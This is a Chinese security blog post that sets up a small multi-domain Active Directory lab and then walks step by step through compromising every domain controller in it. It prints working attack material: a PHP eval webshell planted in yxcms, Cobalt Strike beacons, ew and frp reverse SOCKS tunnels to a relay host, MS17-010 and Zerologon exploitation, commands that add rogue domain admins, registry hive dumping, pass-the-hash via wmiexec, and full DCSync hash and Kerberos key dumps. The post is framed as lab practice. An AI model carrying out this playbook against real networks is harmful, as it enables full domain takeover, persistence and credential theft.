freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透-小型域环境搭建及渗透攻击实践
2021-08-26 08:24:29

一、前言

搭建了二级域,子域和控制域,攻击者可以以WEB服务器作为入口然后攻击子域控制器进而控制整个内网。

本来父域控制器下还有个父域用户,财务域控制器下有个财务核心主机,渗透的截图没有了索性直接删掉了。

网络拓扑如下:

image-20210825221104852

二、域环境搭建

(一)父域

用户名Shandong
IP地址10.10.3.2
域名shandong.com
DNS10.10.3.2
备用DNS10.10.3.2

创建父域并新建用户:

image.png

image.png

image.png

image.png

image.png

image.png

重启后,新建域用户。

image.png

image.png

image.png

image.png

image.png

(二)辅域控制器

用户名Shandongbak
IP地址10.10.3.3
DNS10.10.3.3
备用DNS10.10.3.2

新建辅助域:

image.png

image.png

image.png

image.png

image.png

image.png

image.png

(三)子域控制器

用户名Jinan
IP地址10.10.3.7
网关地址10.10.3.1
DNS10.10.3.4
备用DNS10.10.3.2
外网地址10.10.21.2
网关地址10.10.21.1
外网DNS地址10.10.21.2

创建子域

image.png

image.png

image.png

image.png

(四)财务域

用户名Caiwu
IP地址10.10.21.3
网关地址10.10.21.1
DNS10.10.21.3
备用DNS10.10.3.2
财务域IP地址172.16.5.2
网关地址172.16.5.1
财务域DNS地址172.16.5.2

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

(五)WEB服务器

用户名Web-PC
IP地址10.10.3.9
外网IP地址192.168.31.160

WEB服务器是子域下的一台主机,用来运行web服务,拥有两个IP地址,连接外网和内网。

image.png

创建用户

image.png

在WEB服务器安装phpstudy并部署yxcms1.2.1用来作为渗透的入口

image.png

环境部署完成后,拓扑结构如下:

image-20210825221104852

三、对WEB服务器进行渗透

(一)对网站进行渗透

image.png

使用http://192.168.31.160/index.php?r=admin/index/login,可以进入到网站的后台登录页面。

image.png

使用Burpsuite,对后台登录页面进行爆破

image.png

选择字典

image.png

密码1234456 返回的长度与众不同

image.png

尝试使用123456登录,登录成功

image.png

YxcmsApp 1.2.1存在漏洞,在前台模板写入 一句话木马 <?php @eval($_POST['pass']);?>

image.png

image.png

image.png

然后使用菜刀,连接一句话木马

image.png

(二)内网信息收集

image.png

查看系统信息

image.png

查看运行的进程

image.png

通过网站查看 运行的进程中有没有杀软

image.png

发现没有杀软

(三)利用CS提权

在 中间服务器 开启CS的服务端

image.png

然后运行客户端

image.png

创建监听

image.png

然后生成木马

image.png

image.png

将木马上传到靶机执行。

image.png

执行beacon.exe

image.png

可以看到成功上线,而且是管理员权限

image.png

将sleep设置为0

image.png

image.png

使用 插件上传nbtscan,进行内网扫描

image.png

开始扫描

image.png

image.png

扫描到了四台主机(其实还有两台没有开机,内存不够了(′д` )…彡…彡)

image.png

发现域控是10.10.3.7,下一步 获取域控的权限。

四、对子域控制器进行渗透提权

(一)建立代理

首先上传ew到web服务器(ew不是很稳定,最好还是使用frp)

image.png

image.png

在中间服务器上添加一个隧道,把1080端口收到的代理请求转发给888端口

ew_for_Win.exe -s rcsocks -l 1080 -e 888

image.png

通过CS客户端,在目标服务器(Web服务器)上启动SOCKS5服务并反弹到中间服务器的888端口

shell ew_for_Win.exe -s rssocks -d 192.168.31.99 -e 888

192.168.31.99 是中间服务器的地址

image.png

使用Proxifier测试

image.png

代理成功

image.png

(二)使用MSF进攻子域控制器

1、MSF设置隧道代理

setg Proxies socks5:192.168.31.99:1080
setg ReverseAllowProxy true

image.png

2、搜索MS17_010模块,使用第1个

image.png

set rhosts 10.10.3.7 (10.10.3.7 )是之前扫描到的域控的地址

image.png

发现域控存在永恒之蓝漏洞,而且系统是 windows 2016

3、使用 ms17_010的command进行攻击

image.png

image.png

攻击成功

(三)创建域管理员用户

1、创建域控用户

set command net user test0327 Abc123! /add /domain

image.png

2、将用户加入域管理员组

set command net group "Domain Admins" test0327 /add /domain

image.png

3、检查用户情况

set command net user test0327

image.png

(四)创建子域控制器的木马

1、创建中转监听

image.png

image.png

2、生成木马

image.png

image.png

(五)使用CVE-2020-1472攻击域控

1、首先下载impacket的工具包

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket/
sudo python3 setup.py install

2、检查域控administrator-hash的值

(该步骤 主要用于对比hash的值, 实际环境中不知道域控的密码,可以省略该步骤)

vim /etc/proxychains.conf

image.png

kali中 proxychains的配置,使用中间服务器的代理。

proxychains impacket-secretsdump jinan.shandong.com/Administrator:'p@ssw0rd'@10.10.3.7 -just-dc-user "JINAN$"

image.png

得到:d8e71d5131bebb8e1e90d1bb2b8d3849

3、验证是否存在漏洞

使用zerologon_tester.py验证是否存在漏洞

proxychains git clone https://github.com/SecuraBV/CVE-2020-1472.git

cd CVE-2020-1472pip install -r requirements.txt

image.png

proxychains python3 zerologon_tester.py JINAN 10.10.3.7

image.png

image.png

4、CVE-2020-1472 exp

使用 cve-2020-1472-exploit.py将机器账户重置。

下载地址 https://github.com/VoidSec/CVE-2020-1472

proxychains git clone https://github.com/VoidSec/CVE-2020-1472

image.png

proxychains python3 cve-2020-1472-exploit.py -n JINAN$ -t 10.10.3.7

image.png

**注:**如果操作过程中出现如下报错:

AttributeError: module ‘impacket.dcerpc.v5.nrpc’ has no attribute ‘NetrServerPasswordSet2’

重新安装最新版本的impacket

git clone https://github.com/SecureAuthCorp/impacketcd impacket

pip install . (后面有个点,代表当前目录)image.png

5、DCSync 导出所有凭据

域控的机器账户可以使用 DCSync 导出域内所有用户的凭据。

进入 impackt/impackt/examples/ 目录下 执行如下命令

proxychains impacket-secretsdump -no-pass -just-dc jinan.shandong.com/JINAN\$@10.10.3.7

image.png

Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1429dda96aa048808ea054fd10fb9f41:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test0313:1105:aad3b435b51404eeaad3b435b51404ee:823dac660b875ec111137edc8bd4cec0:::
test0327:1106:aad3b435b51404eeaad3b435b51404ee:4ddec0a4c1b022c5fd8503826fbfb7f2:::
JINAN$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WEB-PC$:1104:aad3b435b51404eeaad3b435b51404ee:778b992127cbedbef6bbfd36b72bb933:::
SHANDONG0$:1103:aad3b435b51404eeaad3b435b51404ee:315678ce21517c89e65e2d61b5c53e67:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:941814e3828089e2de8c6f62f50e43b80137dbc9119adee1b1f078b93f465fbf
krbtgt:aes128-cts-hmac-sha1-96:8f3182f2c5a4e7362ede6c37c9e41202
krbtgt:des-cbc-md5:0efb6149628934f1
test0313:aes256-cts-hmac-sha1-96:842b3c482643d9d10e620e3e7cebeeb953113f3995d7dd9532a605df3e3da53f
test0313:aes128-cts-hmac-sha1-96:3955abedc5a1f404885999b80c1f655e
test0313:des-cbc-md5:07da0858dff71002
test0327:aes256-cts-hmac-sha1-96:0b22713e7609d481293d70238a48aeb112ee35bf14902f55fbcd0f64d0af7467
test0327:aes128-cts-hmac-sha1-96:f03026b303d24c24af6ce73769a4c8c4
test0327:des-cbc-md5:830715bf16aea8b6
JINAN$:aes256-cts-hmac-sha1-96:46ef1468e5f74e53f1da0b28567188ce698a78de8147e23bfa56c540aaf049bf
JINAN$:aes128-cts-hmac-sha1-96:474ea70427e31fc03518fe7058f09c44
JINAN$:des-cbc-md5:01fde9c47a047632
WEB-PC$:aes256-cts-hmac-sha1-96:64b5ba3cdb9e7b5faa1889faec134a5eecdd811b1e66e343e6cb4e05e6f8f3cf
WEB-PC$:aes128-cts-hmac-sha1-96:3927c4b199fc02bbada6f53b759c4963
WEB-PC$:des-cbc-md5:76bc6e972649c78a
SHANDONG0$:aes256-cts-hmac-sha1-96:f972050c17459fb2ba8bb3d006baa730b652ec687b66d199433172b1919a627c
SHANDONG0$:aes128-cts-hmac-sha1-96:fd14409e9609985facbe071928eaa62d
SHANDONG0$:des-cbc-md5:0db007256b5b080b

得到了所有用户的hash值

6、恢复域机器的账户密码

恢复JINAN$ 机器账户的密码,通过wmic,pass the hash 拿到域控制器的本地管理员权限

cp /usr/share/doc/python3-impacket/examples/wmiexec.py .(复制wmiexec.py到到当前目录)

chmod +x wmiexec.pyproxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 jinan.shandong.com/Administrator@10.10.3.7

(aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 是administrator 用户的hash 值)

image.png

可以破解出域管密码,使用net结合wmic、schtasks等远程执行命令方法离线获取保存在注册表中的域控凭证,也可以使用imapcket中的远程执行工具通过hash传递获取。当然也可以通过mimikatz在域控上直接获取。

然后分别执行,拷贝本机中SAM数据库到本地端:

这个地方要拼手速,一定要快

reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.save

image.png

image.png

7、提取出机器账号的明文hex

执行

proxychains impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

image.png

获得hex值:

df3b445599f68c15f1d47038d9f3240e6fcf3779ed75499381c7fe8fbeaa39e9493611c0af97d031bd290d5b104a13e51ffcd54945d85e2ebbd537ce89d366c88561fbf825f89ad44b1a529c13717660c3f9128e72b3a8b33f27cda4fcc6e03cfd00c369bbd11b861ba62b4ddd21cae84fc814ed9ef356e7a49ff385ac5203bc89fcaf9eca3c7aa93de79d801718ee2433cf54aae49e73f674f8a59e308e177a54ba63585a47ba3b74e9215881b489b5a179de0b5aab0128405f57beec71ca693fcbad97777a8e02af142c58ce9d54210127a56a0d7e0ed91defec8d3e253cc332fb56cd7402ca193fdc774406a35c9e

8、恢复域机器

注意 机器名 用JINAN@JINAN

proxychains python3 restorepassword.py JINAN@JINAN -target-ip 10.10.3.7 -hexpass df3b445599f68c15f1d47038d9f3240e6fcf3779ed75499381c7fe8fbeaa39e9493611c0af97d031bd290d5b104a13e51ffcd54945d85e2ebbd537ce89d366c88561fbf825f89ad44b1a529c13717660c3f9128e72b3a8b33f27cda4fcc6e03cfd00c369bbd11b861ba62b4ddd21cae84fc814ed9ef356e7a49ff385ac5203bc89fcaf9eca3c7aa93de79d801718ee2433cf54aae49e73f674f8a59e308e177a54ba63585a47ba3b74e9215881b489b5a179de0b5aab0128405f57beec71ca693fcbad97777a8e02af142c58ce9d54210127a56a0d7e0ed91defec8d3e253cc332fb56cd7402ca193fdc774406a35c9e

注意 :****如果没有restorepassword.py文件,可以从网上下载,下载地址:https://github.com/dirkjanm/CVE-2020-1472

image.png

9、检查情况

恢复密码之后:

image.png

(七) 子域控制器上线CS

可以创建域控组用户、可以利用黄金、白银、PTH、psexec、pth-winexe、wmiexec、smbexec等等技术进行普通域控制!

这里使用一个创建用户的方法:

1、创建一个域管理用户

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 jinan.shandong.com/Administrator@10.10.3.7
net user biu0327 Abc123! /add /domainnet group "domain admins" biu0327 /add /domain

image.png

2、建立IPC

在子域用户(Web)机器上建立IPC与 子域控制器连接

shell net use \\10.10.3.7\ipc$ "Abc123!" /user:biu0327

image.png

shell net use

image.png

创建成功

获取权限目录

shell dir \\10.10.3.7\c$

image.png

获取到了 域控制器的目录

上传之前生成的域控制器木马 到 域普通用户(web)

shell dir查看

image.png

然后利用IPC 将 beacon-dc.exe 上传到 域控制器

shell copy beacon-dc.exe \\10.10.3.7\c$

image.png

image.png

上传成功

3、执行木马

在中间服务器机器上,利用 wmiexec.exe 执行 子域控制器的beacon-dc.exe

wmiexec.exe biu0327:Abc123!@10.10.3.7

image.png

上线成功!

image.png

五、跨域攻击父域

这里使用域信任关系对父域进行渗透

1、使用mimikatz获取hash

image.png

image.png

image.png

得到 Administrator的hash :de26cce0356891a4a020e7c4957afc72

2、利用wmiexec.py,创建用户

在kali中,使用 impackt/example 下的wmiexec.py

proxychains python3 ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:``de26cce0356891a4a020e7c4957afc72`` SHANDONG.shandong.com/administrator@10.10.3.2

(aad3b435b51404eeaad3b435b51404ee 代表administrator的hash,只要用户名是administrator都是该值)

image.png

net user fu0327 Abc123! /add /domain
net group "domain admins" fu0327 /add /domain

image.png

上传木马并执行。 (此处的木马可以与 子域控制器中执行的木马相同)

image.png

上线了 CS

image.png

六、对辅助域进行渗透

攻击辅助域,和攻击父域的过程一样

proxychains python3 ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:``de26cce0356891a4a020e7c4957afc72`` SHANDONGBAK.shandong.com/administrator@10.10.3.3

image.png

net user bak0327 Abc123! /add /domain
net group "domain admins" bak0327 /add /domain

image.png

成功上线CS

image.png

七、攻击财务域控制器

(一)信息收集

因为子域控制器,还有一个IP地址,10.10.21.2,上传nbtscan到子域控制器, 对该网段进行扫描

image.png

image.png

发现一台 IP为,10.10.21.3 的域控制器。

(二)使用Frp 设置二级代理

1、首先在中间服务器上执行

[common]
bind_addr = 0.0.0.0
bind_port = 7000

frps.exe -c frps.ini

2、在域普通用户(web)上执行

# frpc.ini
[common]
server_addr = 192.168.31.99
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.9
local_port = 9999
remote_port = 9999
shell frpc.exe -c frpc.ini
[common]
bind_addr = 10.10.3.9
bind_port = 7000

shell frps.exe -c frps.ini

3、在子域控制器上执行

# frpc.ini
[common]
server_addr = 10.10.3.9
server_port = 7000
[http_proxy]
type = tcp
remote_port = 9999
plugin = socks5

frpc.exe -c frpc.ini

4、Proxifier中

image.png

(三)使用MSF渗透

1、MSF设置代理

setg Proxies socks5:192.168.31.99:9999
setg ReverseAllowProxy true

image.png

2、使用 msf17_010扫描

image.png

image.png

image.png

显示为 Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)的系统,并且存在永恒之蓝漏洞

3、使用exp攻击

image.png

set payload windows/x64/meterpreter/reverse_tcp

image.png

net user cai0328 Abc123! /add /domain
net group "domain admins" cai0328 /add /domain

image.png

image.png

image.png

image.png

4、使用cve-2020-1472攻击

proxychains python3 zerologon_tester.py CAIWU 10.10.21.3

image.png

image.png

proxychains python3 cve-2020-1472-exploit.py -n CAIWU$ -t 10.10.21.3

image.png

image.png

proxychains impacket-secretsdump -no-pass -just-dc caiwu.com/CAIWU\$@10.10.21.3

image.png

Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48e2af7bfb5a5950b8ec1497fcc33:::
cai0328:1104:aad3b435b51404eeaad3b435b51404ee:4ddec0a4c1b022c5fd8503826fbfb7f2:::
CAIWU$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CAIWUCORE$:1103:aad3b435b51404eeaad3b435b51404ee:3688100bf5e575715d54c5d94fbc1192:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:be494aef131d2276a02f801a9691b6dbb44943599643df936c893e06a35960ec
krbtgt:aes128-cts-hmac-sha1-96:01f881ce84025e8c1ffca192a9b454f1
krbtgt:des-cbc-md5:0167c2496ef1086d
cai0328:aes256-cts-hmac-sha1-96:1884c203e4e1ebbb86975f6ba1570fd864d102465bbc94bdd0191e9c94db311d
cai0328:aes128-cts-hmac-sha1-96:e4e0793d4e7a376034ab85b62a6843a7
cai0328:des-cbc-md5:3720cee9da15b02f
CAIWU$:aes256-cts-hmac-sha1-96:afeeb7e76a8ef4e712a718c1c2018d91466f7207b3fabadff2fdc8d28a677
CAIWU$:aes128-cts-hmac-sha1-96:b313d65b21643141b9093a9f8e0a7726
CAIWU$:des-cbc-md5:29e3b62a6d6d5b19
CAIWUCORE$:aes256-cts-hmac-sha1-96:13d69db661edb1f99005c36071240bcc2312893b82216013d08caa3752e68a40
CAIWUCORE$:aes128-cts-hmac-sha1-96:f33e3a939e3e35114883c1c3e69fa4c6
CAIWUCORE$:des-cbc-md5:e525165d6b34b30b

然后恢复域控制器的密码(此处省略)

使用wmiexec.py 获得shell

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72 caiwu.com/Administrator@10.10.21.3

在中间服务器上利用 CS生成木马

创建中转

image.png

生成木马

image.png

image.png

将生成的木马, 复制到Kali,按照上边的方法利用wmiexec 上传并执行,获得shell

八、总结

从搭建域环境到攻击,既熟悉了域环境的搭建,又熟悉了域环境的总体流程。本来域控制器下和财务域控制器下分别还有两台主机的,从上线财务域控制器后面的截图没有了,索性直接给删掉了,学习到的知识还是非常多的。从web渗透、一级代理、二级代理、ms17_010漏洞利用、CVE-2020-1472漏洞利用、IPC、域信任关系、Wimexec使用等等。部分地方攻击过程复杂了,还有许多其他可利用的方法。通过此次渗透会对内网攻击有一个整体的认识。水平有限,努力学习。

# 内网渗透 # 域渗透 # 代理工具 # WEB攻击 # 系统漏洞
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录